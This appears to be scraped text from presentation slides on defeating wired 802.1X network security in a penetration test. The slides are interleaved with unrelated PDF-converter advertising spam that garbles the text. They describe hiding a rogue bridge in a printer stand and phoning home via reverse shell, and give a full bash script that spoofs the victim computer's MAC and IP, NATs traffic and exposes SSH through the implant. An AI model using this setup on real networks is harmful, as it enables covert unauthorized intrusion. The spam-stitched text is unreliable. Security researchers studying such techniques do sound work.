Don’t Call Us, We’ll Call You
We can also have our bridge contact us instead 
of us contacting it (reverse shell).
• Probably makes more sense given the security 
–If they’ve got 802.1X, they probably don’t let any 
port traffic in to their workstations
• Plenty of options to phone home
–SSH
–Openvpn
–Many manymore
Convert multiple pdf to jpg online - Convert PDF to JPEG images in C#.net, ASP.NET MVC, WinForms, WPF project
How to convert PDF to JPEG using C#.NET PDF to JPEG conversion / converter library control SDK
convert pdf image to jpg online; change file from pdf to jpg on
Convert multiple pdf to jpg online - VB.NET PDF Convert to Jpeg SDK: Convert PDF to JPEG images in vb.net, ASP.NET MVC, WinForms, WPF project
Online Tutorial for PDF to JPEG (JPG) Conversion in VB.NET Image Application
convert pdf to 300 dpi jpg; .net convert pdf to jpg
Choosing An IP
We need an IP for the bridge in order to NAT.  So 
what IP do we use?
I picked an IP that shouldn’t be in use on the 
network.  I chose an IP in 169.254.0.0, which is 
self-assigned in the event that an interface can’t 
talk to its DHCP server.  In other words, you 
shouldn’t see it on a production network unless 
there’s some sort of problem…
C# Create PDF from images Library to convert Jpeg, png images to
Batch convert PDF documents from multiple image formats, including Jpg, Png, Bmp, Gif, Tiff, Bitmap, .NET Graphics, and REImage.
change pdf to jpg; convert pdf to jpeg
VB.NET Create PDF from images Library to convert Jpeg, png images
Components to batch convert PDF documents in Visual Basic .NET class. Support create PDF from multiple image formats in VB.NET, including Jpg, Png, Bmp, Gif
convert pdf file into jpg format; change from pdf to jpg on
Interaction With the Client
Before we get too far down the rabbit hole, I 
wanted to mention that I haven’t really found 
any decent way of directly attacking the 
computer behind the bridge.
What source IP do you use?  We’d need to 
source NAT in that direction and without a good 
patsy computer, there’s no good way of doing it.
VB.NET PDF File Merge Library: Merge, append PDF files in vb.net
Combine multiple specified PDF pages in into single one file. scanned images to PDF, such as tiff, jpg, png, gif Append one PDF file to the end of another one in
change pdf to jpg on; change pdf to jpg image
C# PDF File Merge Library: Merge, append PDF files in C#.net, ASP.
Free online C#.NET source code for combining multiple PDF pages together in .NET framework. Combine scanned images to PDF, such as tiff, jpg, png, gif, bmp
convert multiple pdf to jpg; best pdf to jpg converter
The Pre-Populated Setup
Our Scenario:
We’re doing a full scope pen test on an 
organization that’s using wired 802.1X security.
The folks responsible for testing physical security 
have done recon and found a perfect hiding spot 
in a printer stand.  They return with a printer 
configuration page with all the network info 
we’d need.
C# PDF Convert to Images SDK: Convert PDF to png, gif images in C#
An advanced .NET control able to batch convert PDF documents to image formats in C#.NET. Support exporting PDF to multiple image forms, including Jpg, Png
.pdf to .jpg online; convert pdf picture to jpg
C# WPF PDF Viewer SDK to convert and export PDF document to other
Create multiple pages Tiff file from PDF document. Convert PDF to image file formats with high quality, support converting PDF to PNG, JPG, BMP and GIF.
best convert pdf to jpg; convert online pdf to jpg
Bringing It All Together
#!/bin/bash
SWMAC=f0:ad:4e:00:02:46
# The switch side mac
COMPMAC=c0:c1:c0:76:35:7c   # provided by printer conf
COMIP=192.168.0.10                   #
GWNET=192.168.0.0/24              #
DEFGW=192.168.0.15                   #
BRINT=br0
SWINT=eth0
# the switch side interface name
COMPINT=eth3
# the computer side interface name
BRIP=169.254.66.66
# bridge IP
DPORT=9876
# incoming port to redirect to ssh
RANGE=61000-62000
# our SNAT port range
C# Create PDF Library SDK to convert PDF from other file formats
control for creating PDF from multiple image formats such as tiff, jpg, png, gif And the PDF document can contain one empty page or multiple empty pages.
convert pdf to jpg for; convert pdf to jpg 100 dpi
VB.NET Create PDF Library SDK to convert PDF from other file
Best VB.NET component to convert Microsoft Office Word control for creating PDF from multiple image formats such Load PDF from stream programmatically in VB.NET.
convert from pdf to jpg; convert multi page pdf to single jpg
Bringing It All Together (2)
#build the bridge
brctladdbr$BRINT
brctladdif$BRINT $COMPINT
brctladdif$BRINT $SWINT
#bring up both sides of the bridge
ifconfig$COMPINT 0.0.0.0 up promisc
ifconfig$SWINT 0.0.0.0 up promisc
#start dark
arptables-A OUTPUT -j DROP
iptables-A OUTPUT -j DROP
Bringing It All Together (3)
# swap the mac address to the switch side mac, 
# so we always know which mac the bridge is
macchanger-m $SWMAC $BRINT
# bring up the bridge with the non-routable IP
ifconfig$BRINT $BRIP up promisc
# add the network info
# add the default route
route  add -net $GWNET dev$BRINT
route add default gw$DEFGW
Bringing It All Together (4)
# use ebtablesto source NAT the $COMPMAC 
# for traffic leaving the device
# from the bridge mac address
ebtables-t nat-A POSTROUTING -s $SWMAC -o 
$SWINT -j snat--to-src$COMPMAC
#use DNAT to map $DPORT to $BRIP:22
iptables-t nat-A PREROUTING -ibr0 -d $COMIP -p 
tcp--dport$DPORT -j DNAT --to $BRIP:22
Bringing It All Together (5)
# set up the source natrules for tcp/udp/icmp
iptables-t nat-A POSTROUTING -o $BRINT -s $BRIP -p tcp-j SNAT --to 
$COMIP:$RANGE
iptables-t nat-A POSTROUTING -o $BRINT -s $BRIP -p udp-j SNAT --to 
$COMIP:$RANGE
iptables-t nat-A POSTROUTING -o $BRINT -s $BRIP -p icmp-j SNAT --to 
$COMIP
#start sshd
/etc/init.d/sshstart
#lift radio silence
arptables-D OUTPUT -j DROP
iptables-D OUTPUT -j DROP
Pre-Populated Demo
Documents you may be interested
Documents you may be interested